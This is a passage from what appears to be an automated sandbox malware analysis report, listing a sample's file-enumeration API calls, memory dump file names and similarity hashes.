                                  • Part of subcall function 00EB4B60: StrCmpCA.SHLWAPI(?,00EC0FC8), ref: 00EB4BD7
                                  • Part of subcall function 00EB4B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00EB4DCD
                                  • Part of subcall function 00EB4B60: FindClose.KERNEL32(000000FF), ref: 00EB4DE2
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                 • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                • String ID:
                                • API String ID: 2667927680-0
                                • Opcode ID: ad92d9b65a336ddf8a0ef28a4ccdeb04f1dbb7e9d91ec0e3881d61000b43e960
                                • Instruction ID: cfb1f664608df19d9c15c2b8bd1573167f3fe8c8c99df47394b1b4206c6d50d5
                                • Opcode Fuzzy Hash: ad92d9b65a336ddf8a0ef28a4ccdeb04f1dbb7e9d91ec0e3881d61000b43e960
                                • Instruction Fuzzy Hash: D421CD7A900208A7DB28EBB0DD56FEE737C9754300F0045A8B665662C5DE7156C8CB91